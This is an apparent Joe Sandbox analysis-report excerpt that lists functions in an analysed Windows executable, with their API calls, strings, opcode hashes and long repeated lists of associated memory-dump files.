CreateFileW.KERNEL32(?,10000000,00000001,00000000,00000003,00000000,00000000), ref: 0044E27B

Strings

\\.\%s, xrefs: 0044E255

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: CreateErrorFileLast_memset_wcslenswprintf
String ID: \\.\%s
API String ID: 2177947037-869905501
Opcode ID: 487fbb89dfbdf298c3ccb0d18573a311c4b69f4fa1911648e7d27b7d10dc47b2
Instruction ID: a37b3d3d2ecd21f617caa717abae622e5c9a45687b6a3dfa0c395e1e336fb0df
Opcode Fuzzy Hash: 487fbb89dfbdf298c3ccb0d18573a311c4b69f4fa1911648e7d27b7d10dc47b2
Instruction Fuzzy Hash: 1201D671B403087BE710EBA5DC47FDE3768BB04700F90065AFB02AA1C1EEB4A541C79A

Function 0042605F Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000000), ref: 0042606D
SetErrorMode.KERNEL32(00000000), ref: 00426075

Part of subcall function 0040AE13: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0040AE4B
Part of subcall function 0040AE13: SetLastError.KERNEL32(0000006F), ref: 0040AE62

GetModuleHandleW.KERNEL32(user32.dll), ref: 004260C4
GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 004260D4

Strings

NotifyWinEvent, xrefs: 004260CE
user32.dll, xrefs: 004260BF

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Error$ModeModule$AddressFileHandleLastNameProc
String ID: NotifyWinEvent$user32.dll
API String ID: 1146408833-597752486
Opcode ID: 6115494687da11d328c8037a1690b475a4d1bceb45c595424fc21a38c18cc643
Instruction ID: 3525ce4617b2ad9fbf4c0d8edb374c6983f3f5c0284de93e7427eee70afea19f
Opcode Fuzzy Hash: 6115494687da11d328c8037a1690b475a4d1bceb45c595424fc21a38c18cc643
Instruction Fuzzy Hash: EF0171706503245FDB11EF66D805A5A3BE8AF44314F05846BF549DB392DB79D8008FAE

Function 0042697E Relevance: 9.2, APIs: 6, Instructions: 246stringCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00426985
lstrlenA.KERNEL32(00000000,00000050,0041C892,00000000,00000001,?,?,000000FF,?,?,?,?,?,?,00000034,00416E66), ref: 004269B6

Part of subcall function 00406820: _memcpy_s.LIBCMT ref: 00406833

_memset.LIBCMT ref: 00426A67
VariantClear.OLEAUT32(?), ref: 00426B44

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: ClearH_prolog3_catch_Variant_memcpy_s_memsetlstrlen
String ID:
API String ID: 4021759052-0
Opcode ID: 14df085b1e84b8d978f4b9964cbb1181de3e977e48d2c0350dcf17858372ed32
Instruction ID: b35b88aef3899d4fbcb36ea237869989e5a797c3b7b4e65a07ace27e38445b6b
Opcode Fuzzy Hash: 14df085b1e84b8d978f4b9964cbb1181de3e977e48d2c0350dcf17858372ed32
Instruction Fuzzy Hash: 26A1EE71A00229DFCF10EFA6E8456EEBBB0FF04314F65405AE451B72A1D738A951CBA9

Function 00440AC0 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 446stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 00440C8C
wsprintfW.USER32 ref: 00440D77
lstrlenW.KERNEL32(?), ref: 00440D87
lstrlenW.KERNEL32(?), ref: 00441105

Strings

\{unknown location}%s, xrefs: 00440D64

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: lstrlen$wsprintf
String ID: \{unknown location}%s
API String ID: 1220175532-2946010297
Opcode ID: 2a7c98212c30b25ae87f9020ee7e113e00a830797a1920eff2970d82155c508a
Instruction ID: ab6183964400c345c54d3b33d9410acc074e00125e03a7f9abc866c6197bd769
Opcode Fuzzy Hash: 2a7c98212c30b25ae87f9020ee7e113e00a830797a1920eff2970d82155c508a
Instruction Fuzzy Hash: 7C222A75A00118CFCB29CF18D995F99B7B1FB8C300F1482D9E9899B364D6B0AAD5CF54

Function 004233BB Relevance: 9.2, APIs: 6, Instructions: 180COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004233C2
VariantClear.OLEAUT32(?), ref: 00423486
CoTaskMemFree.OLE32(?,00000010,004235B5), ref: 00423533
CoTaskMemFree.OLE32(?,00000010,004235B5), ref: 00423541
ctype.LIBCPMT ref: 00423569
ctype.LIBCPMT ref: 00423577

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: FreeTaskctype$ClearH_prolog3Variant
String ID:
API String ID: 151822039-0
Opcode ID: f5477aa6be95372805d57077807984f3105ed1dcdccaa227588ecf1fd995b2d7
Instruction ID: 21b57f40e29660c3db80bffb024d173f444b88fa3173526cc63daa332dc42df8
Opcode Fuzzy Hash: f5477aa6be95372805d57077807984f3105ed1dcdccaa227588ecf1fd995b2d7
Instruction Fuzzy Hash: 92715670A00651DFCB20EFA5D9C486AB7F1BF483057A448AEE1469B761CB78EE84CF54

Function 00420878 Relevance: 9.1, APIs: 6, Instructions: 126COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 0042091B
_memset.LIBCMT ref: 0042094D
_memset.LIBCMT ref: 00420959
SysFreeString.OLEAUT32(?), ref: 0042099B
SysFreeString.OLEAUT32(?), ref: 004209A5
SysFreeString.OLEAUT32(?), ref: 004209AF

Part of subcall function 00408BEE: __CxxThrowException@8.LIBCMT ref: 00408C04
Part of subcall function 00408BEE: __EH_prolog3.LIBCMT ref: 00408C11

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: FreeString$_memset$ClearException@8H_prolog3ThrowVariant
String ID:
API String ID: 320298052-0
Opcode ID: 6ef53bc8e5e0adb7e8768fdd8e4b8cb84fbbe3beef9d6950b6a1e1a45e6ab40d
Instruction ID: 3ebaf8b7ee2b3c26b3a543fe521c8621566833086a0da1833b1b9d0ca81ca62f
Opcode Fuzzy Hash: 6ef53bc8e5e0adb7e8768fdd8e4b8cb84fbbe3beef9d6950b6a1e1a45e6ab40d
Instruction Fuzzy Hash: BE414CB0E01228FFDB11DFA1D884ADEFBB9BF04700F90811BF515A6242C7749990CBA9

Function 00426D5A Relevance: 9.1, APIs: 6, Instructions: 118memoryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00426D7D
SysAllocString.OLEAUT32(?), ref: 00426DE0
SysAllocString.OLEAUT32(?), ref: 00426E11
SysAllocString.OLEAUT32(00000000), ref: 00426E60
SysAllocString.OLEAUT32(00000000), ref: 00426E8F
SysAllocString.OLEAUT32(00000000), ref: 00426EC4

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
